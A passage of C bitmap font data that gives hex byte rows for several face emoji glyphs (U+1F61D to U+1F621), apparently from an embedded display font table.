0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xe0, 0x7, 0x7, 0x80, 0x0, 0x0, 0x0, 0x70,
0x78, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x60,
0xe, 0x0, 0xe1, 0xc0, 0x30, 0x0, 0x0, 0x60,
0x3, 0x80, 0x71, 0xc0, 0x1e, 0x0, 0x0, 0x30,
0x0, 0xc0, 0x38, 0xe0, 0xf, 0xc0, 0x0, 0x30,
0x0, 0x70, 0xe, 0x70, 0x0, 0xf8, 0x0, 0x18,
0x3c, 0x18, 0x7, 0x38, 0x0, 0x1f, 0x0, 0xc,
0x3f, 0xc, 0x3, 0xb8, 0x0, 0x3, 0xc0, 0x6,
0x1f, 0x86, 0x1, 0xdc, 0x0, 0x0, 0x70, 0x3,
0xf, 0xc3, 0x0, 0x7e, 0x0, 0xf, 0xfc, 0x1,
0x87, 0xe1, 0x80, 0x3f, 0x0, 0x1f, 0xff, 0x0,
0xc1, 0xe1, 0xc0, 0x1f, 0x80, 0x3e, 0x1, 0x0,
0x30, 0x0, 0xc0, 0xf, 0xc0, 0x38, 0x0, 0x0,
0x18, 0x0, 0xe0, 0x7, 0xe0, 0x8, 0x0, 0x0,
0x7, 0x0, 0xe0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x1, 0xc1, 0xe0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x7f, 0xe0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0xf, 0xc0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x6, 0x0,
0x0, 0x0, 0x0, 0x60, 0xe, 0x70, 0xf, 0xfe,
0x0, 0x0, 0x1f, 0xfc, 0x7, 0x1c, 0x7, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3, 0x8e, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc1, 0xc0, 0xff,
0xf0, 0xff, 0xc3, 0xff, 0xc1, 0xe0, 0xe0, 0x7f,
0xf8, 0x6, 0x1, 0xff, 0xe0, 0xe0, 0x38, 0x1f,
0xfc, 0x3, 0x0, 0xff, 0xe0, 0x70, 0x1c, 0x7,
0xfe, 0x1, 0x80, 0x7f, 0xe0, 0x70, 0x7, 0x3,
0xff, 0x0, 0xc0, 0x3f, 0xf0, 0x78, 0x1, 0xc0,
0xff, 0x80, 0x60, 0x1f, 0xf0, 0x38, 0x0, 0xe0,
0x3f, 0xc0, 0x30, 0xf, 0xf0, 0x3c, 0x0, 0x38,
0xf, 0xe0, 0x18, 0x7, 0xf0, 0x3c, 0x0, 0xe,
0x1, 0xf0, 0xc, 0x3, 0xe0, 0x3c, 0x0, 0x3,
0x80, 0x78, 0x6, 0x1, 0xe0, 0x1c, 0x0, 0x0,
0xe0, 0x1c, 0x3, 0x0, 0xe0, 0x1c, 0x0, 0x0,
0x78, 0xe, 0x1, 0x80, 0x70, 0x3e, 0x0, 0x0,
0xf, 0x7, 0x0, 0x0, 0x38, 0x3c, 0x0, 0x0,
0x3, 0xc3, 0x80, 0x0, 0x1c, 0x3c, 0x0, 0x0,
0x0, 0xf9, 0xc0, 0x0, 0xe, 0x7c, 0x0, 0x0,
0x0, 0x1f, 0x60, 0x0, 0x6, 0xfc, 0x0, 0x0,
0x0, 0x7, 0xf8, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0xf, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xfc, 0x0, 0x0, 0x0,
0x0,
/* U+1F61D "😝" */
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0xe, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x38, 0xe0, 0x7, 0xc0, 0x0, 0x0,
0x3, 0xe0, 0xe, 0x70, 0x0, 0xf8, 0x0, 0x0,
0x7, 0xc0, 0x7, 0x38, 0x0, 0x1f, 0x0, 0x0,
0xf, 0x80, 0x3, 0xb8, 0x0, 0x3, 0xe0, 0x0,
0x1f, 0x0, 0x1, 0xdc, 0x0, 0x0, 0x7c, 0x0,
0x3e, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x1f, 0x80,
0x7e, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x1f, 0xe0,
0x7f, 0x80, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x3, 0xfc, 0x0,
0x0, 0x3f, 0xc0, 0x7, 0xe0, 0x7, 0xf0, 0x0,
0x0, 0x3, 0xf8, 0x3, 0xf0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x38, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0xf, 0x0,
0x0, 0x0, 0x0, 0xf0, 0xe, 0x70, 0xf, 0xff,
0x0, 0x0, 0x3f, 0xfc, 0x7, 0x1c, 0x7, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3, 0x8e, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc1, 0xc0, 0xff,
0xf0, 0xff, 0xc3, 0xff, 0xc1, 0xe0, 0xe0, 0x7f,
0xf8, 0x6, 0x1, 0xff, 0xe0, 0xe0, 0x38, 0x1f,
0xfc, 0x3, 0x0, 0xff, 0xe0, 0x70, 0x1c, 0x7,
0xfe, 0x1, 0x80, 0x7f, 0xe0, 0x70, 0x7, 0x3,
0xff, 0x0, 0xc0, 0x3f, 0xf0, 0x78, 0x1, 0xc0,
0xff, 0x80, 0x60, 0x1f, 0xf0, 0x38, 0x0, 0xe0,
0x3f, 0xc0, 0x30, 0xf, 0xf0, 0x3c, 0x0, 0x38,
0xf, 0xe0, 0x18, 0x7, 0xf0, 0x3c, 0x0, 0xe,
0x1, 0xf0, 0xc, 0x3, 0xe0, 0x3c, 0x0, 0x3,
0x80, 0x78, 0x6, 0x1, 0xe0, 0x1c, 0x0, 0x0,
0xe0, 0x1c, 0x3, 0x0, 0xe0, 0x1c, 0x0, 0x0,
0x78, 0xe, 0x1, 0x80, 0x70, 0x3c, 0x0, 0x0,
0xf, 0x7, 0x0, 0x0, 0x38, 0x3c, 0x0, 0x0,
0x3, 0xc3, 0x80, 0x0, 0x1c, 0x3c, 0x0, 0x0,
0x0, 0xf9, 0xc0, 0x0, 0xe, 0x7c, 0x0, 0x0,
0x0, 0x1f, 0x60, 0x0, 0x6, 0xfc, 0x0, 0x0,
0x0, 0x7, 0xf8, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0xf, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xfc, 0x0, 0x0, 0x0,
0x0,
/* U+1F61E "😞" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x8,
0x0, 0x40, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x1c,
0x0, 0x38, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x3f,
0x0, 0x3f, 0x0, 0x0, 0x3f, 0x0, 0x0, 0xfe,
0x0, 0x7, 0xf0, 0x0, 0x3d, 0xc0, 0x1f, 0xf8,
0x0, 0x0, 0x7f, 0xe0, 0x1c, 0xe0, 0xf, 0xc0,
0x0, 0x0, 0x3, 0xf0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x7, 0xf8, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x1f, 0xff, 0x80, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x3f, 0x1, 0xf0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7c, 0x0, 0x3e, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x18, 0x0, 0x6, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F61F "😟" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0xc0, 0x0, 0x1, 0x80,
0x1c, 0x0, 0x1c, 0x0, 0xe0, 0x0, 0x0, 0xe0,
0x7, 0x0, 0x1e, 0x0, 0xf0, 0x0, 0x0, 0x78,
0x3, 0xc0, 0xe, 0x0, 0xf0, 0x0, 0x0, 0x1e,
0x0, 0xe0, 0xe, 0x1, 0xe0, 0x0, 0x0, 0x3,
0xc0, 0x38, 0xf, 0x7, 0xe0, 0x0, 0x0, 0x0,
0xfc, 0x1c, 0x7, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x1e, 0x7, 0x3, 0x81, 0x0, 0x0, 0x0, 0x0,
0x1, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x3, 0xc0, 0x0,
0x1e, 0x0, 0x0, 0xfc, 0x0, 0x3, 0xf0, 0x0,
0x1f, 0x80, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0x1f, 0xe0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0xf, 0xf0, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x7, 0xf8, 0x0, 0xf, 0xc0, 0x0, 0x7f, 0x80,
0x3, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0x3f, 0xc0,
0x1, 0xfe, 0x0, 0x3, 0xf0, 0x0, 0xf, 0xc0,
0x0, 0x7e, 0x0, 0x1, 0xf8, 0x0, 0x3, 0xc0,
0x0, 0x1e, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x7f, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x3, 0xe0, 0x3e, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x7, 0xc0, 0x7, 0xc0, 0x0, 0x70, 0x7, 0x0,
0x7, 0x80, 0x0, 0xf0, 0x0, 0x70, 0x3, 0xc0,
0x3, 0x80, 0x0, 0x38, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F620 "😠" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x3, 0x0, 0x0,
0x0, 0x6, 0x0, 0xf, 0xc0, 0x1, 0xf0, 0x0,
0x0, 0xf, 0x80, 0x7, 0xe0, 0x0, 0xfe, 0x0,
0x0, 0x1f, 0x80, 0x3, 0xf0, 0x0, 0xf, 0x80,
0x0, 0x1f, 0x0, 0x1, 0xf8, 0x0, 0x1, 0xf0,
0x0, 0x3e, 0x0, 0x0, 0xfc, 0x0, 0x1, 0xfc,
0x0, 0x3f, 0x80, 0x0, 0x7e, 0x0, 0x1, 0xff,
0x80, 0x7f, 0xe0, 0x0, 0x3f, 0x0, 0x0, 0xff,
0x80, 0x1f, 0xf0, 0x0, 0x3d, 0xc0, 0x0, 0x7f,
0x80, 0x7, 0xf8, 0x0, 0x1c, 0xe0, 0x0, 0x3f,
0xc0, 0x3, 0xfc, 0x0, 0xe, 0x70, 0x0, 0x1f,
0xe0, 0x1, 0xfe, 0x0, 0x7, 0x38, 0x0, 0x7,
0xe0, 0x0, 0x7e, 0x0, 0x7, 0x8e, 0x0, 0x1,
0xe0, 0x0, 0x1e, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0xf, 0xf0, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x3f, 0xff, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x7e, 0x7, 0xe0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x78, 0x0, 0x78, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf0, 0x0, 0xf, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x30, 0x0, 0x3, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F621 "😡" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x3, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3f, 0x87, 0x80, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3d, 0xff, 0x80, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x3f, 0xc, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3e, 0x0, 0x7, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1f, 0x80, 0x7, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1d, 0xc0, 0x3, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x70, 0x3, 0x80, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x38, 0x1, 0xc0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x1c, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x38, 0xf, 0xe, 0x0, 0x70, 0x0, 0x0,
0x0, 0x1c, 0x7, 0xf, 0x0, 0x18, 0x0, 0x0,
0x0, 0x7, 0x3, 0x87, 0x0, 0xe, 0x0, 0x0,
0x0, 0x3, 0x83, 0x87, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0xe1, 0xc1, 0x87, 0xe1, 0x80, 0x0,
0x0, 0x0, 0x71, 0xc0, 0xf, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0xf, 0xf, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x6, 0x1, 0x80, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x3, 0x80, 0x0,
0x0, 0x6, 0x0, 0xf, 0xc0, 0x1, 0xf0, 0x0,
0x0, 0xf, 0x80, 0x7, 0xe0, 0x0, 0x7e, 0x0,
0x0, 0x1f, 0x80, 0x3, 0xf0, 0x0, 0xf, 0xc0,
0x0, 0x3f, 0x0, 0x1, 0xf8, 0x0, 0x1, 0xf0,
0x0, 0x3e, 0x0, 0x0, 0xfc, 0x0, 0x1, 0xfc,
0x0, 0x3f, 0x80, 0x0, 0x7e, 0x0, 0x1, 0xff,
0x80, 0x7f, 0xe0, 0x0, 0x3f, 0x0, 0x0, 0xff,
0x80, 0x1f, 0xf0, 0x0, 0x3d, 0xc0, 0x0, 0x7f,
0x80, 0x7, 0xf8, 0x0, 0x1c, 0xe0, 0x0, 0x3f,
0xc0, 0x3, 0xfc, 0x0, 0xe, 0x70, 0x0, 0x1f,
0xe0, 0x1, 0xfc, 0x0, 0x7, 0x38, 0x0, 0x7,
0xe0, 0x0, 0x7e, 0x0, 0x7, 0x8e, 0x0, 0x1,
0xe0, 0x0, 0x1e, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
